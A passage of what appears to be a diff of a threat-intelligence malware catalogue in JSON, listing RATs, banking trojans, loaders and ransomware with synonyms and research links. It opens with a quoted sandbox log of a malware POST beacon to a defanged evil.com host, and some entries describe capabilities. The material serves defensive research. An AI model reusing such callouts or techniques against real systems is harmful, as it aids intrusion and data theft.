Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", - "meta": { - "synonyms": [ - "BokBot" - ], - "type": [], - "refs": [ - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid" - ] - } - }, - { - "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", - "value": "TreasureHunter", - "description": "", - "meta": { - "synonyms": [ - "huntpos" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", - "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", - "http://adelmas.com/blog/treasurehunter.php" - ] - } - }, - { - "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", - "value": "AlmaLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "da032a95-b02a-4af2-b563-69f686653af4", - "value": "Ratty", - "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/shotskeber/Ratty" - ] - } - }, - { - "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", - "value": "Terminator RAT", - "description": "", - "meta": { - "synonyms": [ - "Fakem RAT" - ], - "type": [], - "refs": [ - "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", - "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" - ] - } - }, - { - "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a", - "value": "Connic", - "description": "", - "meta": { - "synonyms": [ - "SpyBanker" - ], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/" - ] - } - }, - { - "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", - "value": "Mikoponi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f", - "value": "FlexNet", - "description": "", - "meta": { - "synonyms": [ - "gugi" - ], - "type": [], - "refs": [ - "https://twitter.com/LukasStefanko/status/886849558143279104" - ] - } - }, - { - "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", - "value": "Elise", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", - "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.joesecurity.org/blog/8409877569366580427" - ] - } - }, - { - "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", - "value": "Heriplor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - } - }, - { - "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", - "value": "XRat", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.lookout.com/xrat-mobile-threat" - ] - } - }, - { - "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", - "value": "Roseam", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" - ] - } - }, - { - "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", - "value": "August Stealer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene", - "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html" - ] - } - }, - { - "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", - "value": "PvzOut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - } - }, - { - "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", - "value": "Cutlet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" - ] - } - }, - { - "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", - "value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", - "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" - ] - } - }, - { - "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", - "value": "Boaxxe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" - ] - } - }, - { - "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "", - "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - } - }, - { - "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", - "value": "Virut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" - ] - } - }, - { - "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", - "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" - ] - } - }, - { - "uuid": "9240ce4f-2c48-4e37-baaf-b8b9050c58f5", - "value": "Bahamut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - } - }, - { - "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", - "value": "Aveo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" - ] - } - }, - { - "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", - "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] - } - }, - { - "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", - "value": "Powersniff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://lokalhost.pl/gozi_tree.txt" - ] - } - }, - { - "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", - "value": "Nemim", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" - ] - } - }, - { - "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", - "value": "Svpeng", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" - ] - } - }, - { - "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", - "value": "NanoLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] - } - }, - { - "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", - "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] - } - }, - { - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "", - "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] - } - }, - { - "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] - } - }, - { - "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", - "value": "Molerat Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/iec/", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" - ] - } - }, - { - "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "", - "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], - "refs": [ - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] - } - }, - { - "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] - } - }, - { - "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] - } - }, - { - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "", - "meta": { - "synonyms": [ - "houdini" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] - } - }, - { - "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", - "value": "Anel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" - ] - } - }, - { - "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - } - }, - { - "uuid": "37f4fe10-96e4-4b3e-9159-80023270d3a6", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", - "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", - "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", - "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" - ] - } - }, - { - "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] - } - }, - { - "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] - } - }, - { - "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", - "value": "Matsnu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" - ] - } - }, - { - "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [ - "Destover" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] - } - }, - { - "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] - } - }, - { - "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] - } - }, - { - "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", - "value": "Tinba", - "description": "", - "meta": { - "synonyms": [ - "Zusy", - "Illi", - "TinyBanker" - ], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", - "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", - "http://contagiodump.blogspot.com/2012/06/amazon.html", - "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", - "http://garage4hackers.com/entry.php?b=3086", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" - ] - } - }, - { - "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] - } - }, - { - "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - } - }, - { - "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", - "value": "MyloBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" - ] - } - }, - { - "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" - ] - } - }, - { - "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", - "value": "DarkPulsar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] - } - }, - { - "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", - "value": "Moure", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] - } - }, - { - "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", - "value": "ISR Stealer", - "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" - ] - } - }, - { - "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", - "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] - } - }, - { - "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", - "value": "BBSRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] - } - }, - { - "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "", - "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] - } - }, - { - "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", - "value": "Thanatos", - "description": "", - "meta": { - "synonyms": [ - "Alphabot" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" - ] - } - }, - { - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "eaf0afc1-de01-450f-86a1-12a93a3db256", - "value": "FlexiSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - } - }, - { - "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", - "value": "OddJob", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - } - }, - { - "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", - "value": "NETEAGLE", - "description": "", - "meta": { - "synonyms": [ - "ScoutEagle" - ], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "", - "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], - "refs": [ - "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] - } - }, - { - "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": "Synth Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", - "value": "MoonWind", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" - ] - } - }, - { - "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", - "https://github.com/vithakur/schneiken" - ] - } - }, - { - "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ] - } - }, - { - "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", - "value": "Neuron", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - } - }, - { - "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG", - "description": "", - "meta": { - "synonyms": [ - "gresim" - ], - "type": [], - "refs": [ - "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ] - } - }, - { - "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", - "value": "Arik Keylogger", - "description": "", - "meta": { - "synonyms": [ - "Aaron Keylogger" - ], - "type": [], - "refs": [ - "http://remote-keylogger.net/", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" - ] - } - }, - { - "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", - "value": "Bitsran", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - } - }, - { - "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] - } - }, - { - "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", - "value": "ISMDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/greenbug/", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" - ] - } - }, - { - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", - "meta": { - "synonyms": [ - "Werdlod", - "Tsukuba" - ], - "type": [], - "refs": [ - "https://github.com/cocaman/retefe", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" - ] - } - }, - { - "uuid": "606f778a-8b99-4880-8da8-b923651d627b", - "value": "PowerRatankba", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - } - }, - { - "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] - } - }, - { - "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", - "value": "Darksky", - "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to 